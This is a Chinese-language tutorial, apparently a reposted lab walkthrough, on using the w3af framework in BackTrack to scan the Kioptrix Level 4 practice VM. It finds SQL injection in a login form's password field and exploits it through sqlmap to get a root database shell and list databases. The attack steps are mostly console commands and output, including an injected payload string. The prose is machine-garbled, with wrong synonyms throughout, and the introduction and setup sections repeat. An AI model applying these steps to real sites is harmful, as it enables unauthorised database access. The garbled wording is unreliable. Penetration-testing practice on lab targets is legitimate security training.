|
|
|
联系客服020-83701501

w3af简单使用教程

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
w3af冗杂操纵教程

w3af是一个Web独霸按次攻击和查看框架.该式子已逾越130个插件,其中包罗查看网站爬虫,SQL注入(SQL Injection),跨站(XSS),当地文件包罗(LFI),长途文件包罗(RFI)等.该式子的目的是要竖立一个框架,以接头和开荒Web独霸安全裂痕,所以很容易操纵和扩张.

0×00 概述
在BackTrack5R3下操纵w3af测试Kioptrix Level 4的SQL注入裂痕.
0×01 简介
w3af是一个Web独霸按次攻击和查看框架.该式子已逾越130个插件,其中包罗查看网站爬虫,SQL注入(SQL Injection),跨站(XSS),当地文件包罗(LFI),长途文件包罗(RFI)等.该式子的目的是要竖立一个框架,以接头和开荒Web独霸安全 裂痕,所以很容易操纵和扩张.
0×02 布置

Default
1 root@bt:~# apt-get install w3af

0×03 启动

Default
1 root@bt:~# cd /pentest/web/w3af/

w3af 是一个Web独霸按次攻击和查看框架.该式子已逾越130个插件,其中包罗查看网站爬虫,SQL注入(SQL Injection),跨站(XSS),当地文件包罗(LFI),长途文件包罗(RFI)等.该式子的目的是要竖立一个框架,以接头和开荒Web独霸安全 裂痕,所以很容易操纵和扩张.

0×00 概述

在BackTrack5R3下操纵w3af测试Kioptrix Level 4的SQL注入裂痕.

0×01 简介

w3af是一个Web独霸按次攻击和查看框架.该式子已逾越130个插件,其中包罗查看网站爬虫,SQL注入(SQL Injection),跨站(XSS),当地文件包罗(LFI),长途文件包罗(RFI)等.该式子的目的是要竖立一个框架,以接头和开荒Web独霸安全 裂痕,所以很容易操纵和扩张.

0×02 布置

Default
1 root@bt:~# apt-get install w3af

0×03 启动

Default
12 root@bt:~# cd /pentest/web/w3af/root@bt:/pentest/web/w3af# ./w3af_console

0×04 裂痕扫描配置

Default
123456789101112131415161718 w3af>>> plugins//进入插件模块w3af/plugins>>> list discovery//列出部门用于发现的插件w3af/plugins>>> discovery findBackdoor phpinfo webSpider//启用findBackdoor phpinfo webSpider这三个插件w3af/plugins>>> list audit//列出部门用于裂痕的插件w3af/plugins>>> audit blindSqli fileUpload osCommanding sqli xss//启用blindSqli fileUpload osCommanding sqli xss这五个插件w3af/plugins>>> back//前去主模块w3af>>> target//进入配置目的的模块w3af/config:target>>> set target http://192.168.244.132///把目的设置为http://192.168.244.132/w3af/config:target>>> back//前去主模块

0×05 裂痕扫描

Default
1234567891011121314151617181920212223242526272829 w3af>>> start---New URL found by phpinfo plugin: http://192.168.244.132/New URL found by phpinfo plugin: http://192.168.244.132/checklogin.phpNew URL found by phpinfo plugin: http://192.168.244.132/index.phpNew URL found by webSpider plugin: http://192.168.244.132/New URL found by webSpider plugin: http://192.168.244.132/checklogin.phpNew URL found by webSpider plugin: http://192.168.244.132/index.phpFound 3 URLs and 8 different points of injection.The list of URLs is:- http://192.168.244.132/index.php- http://192.168.244.132/checklogin.php- http://192.168.244.132/The list of fuzzable requests is:- http://192.168.244.132/ | Method: GET- http://192.168.244.132/ | Method: GET | Parameters: (mode="phpinfo")- http://192.168.244.132/ | Method: GET | Parameters: (view="phpinfo")- http://192.168.244.132/checklogin.php | Method: GET- http://192.168.244.132/checklogin.php | Method: POST | Parameters: (myusername="", mypassword="")- http://192.168.244.132/index.php | Method: GET- http://192.168.244.132/index.php | Method: GET | Parameters: (mode="phpinfo")- http://192.168.244.132/index.php | Method: GET | Parameters: (view="phpinfo")Blind SQL injection was found at: "http://192.168.244.132/checklogin.php", using HTTP method POST. The injectable parameter is: "mypassword". This vulnerability was found in the requests with ids 309 to 310.A SQL error was found in the response supplied by the web application, the error is (only a fragment is shown): "supplied argument is not a valid MySQL". The error was found on response with id 989.A SQL error was found in the response supplied by the web application, the error is (only a fragment is shown): "mysql_". The error was found on response with id 989.SQL injection in a MySQL database was found at: "http://192.168.244.132/checklogin.php", using HTTP method POST. The sent post-data was: "myusername=John&Submit=Login&mypassword=d'z"0". The modified parameter was "mypassword". This vulnerability was found in the request with id 989.Scan finished in 19 seconds.---//初步扫描

0×06 裂痕独霸配置

Default
12345678910111213141516171819202122232425262728293031323334353637 w3af&gt;&gt;&gt; exploit//进入裂痕独霸模块w3af/exploit&gt;&gt;&gt; list exploit//列出部门用于裂痕独霸的插件w3af/exploit&gt;&gt;&gt; exploit sqlmap//操纵sqlmap中止SQL注入裂痕的测试---Trying to exploit using vulnerability with id: [1010, 1011]. Please wait...Vulnerability successfully exploited. This is a list of available shells and proxies:- [0] &lt;sql object ( dbms: "MySQL &gt;= 5.0.0" | ruser: "root@localhost" )&gt;Please use the interact command to interact with the shell objects.---//测试存在SQL注入裂痕//这里要记住shell objects(这里是0),等一下要用到0x07 裂痕独霸w3af/exploit&gt;&gt;&gt; interact 0//interact + shell object便或者独霸了 ---Execute "exit" to get out of the remote shell. Commands typed in this menu will be run through the sqlmap shellw3af/exploit/sqlmap-0&gt;&gt;&gt;---//sqlmap的一个交互式模块 w3af/exploit/sqlmap-0&gt;&gt;&gt; dbs    ---Available databases:  [3]:[*] information_schema[*] members[*] mysql---//靡烂得到数据库动静 同类安全扫描软件 IBM操纵教程《<a title="IBM Rational Appscan操纵之扫描后果解析" href="http://www.91ri.org/3809.html">IBM Rational Appscan操纵之扫描后果解析</a>》 转自freebuf作者line由<a title="网络安全" href="http://www.91ri.org">网络安全</a>攻防研究室(www.91ri.org)<a title="动静安全" href="http://www.91ri.org">动静安全</a>小组收集整理。

数安新闻+更多

证书相关+更多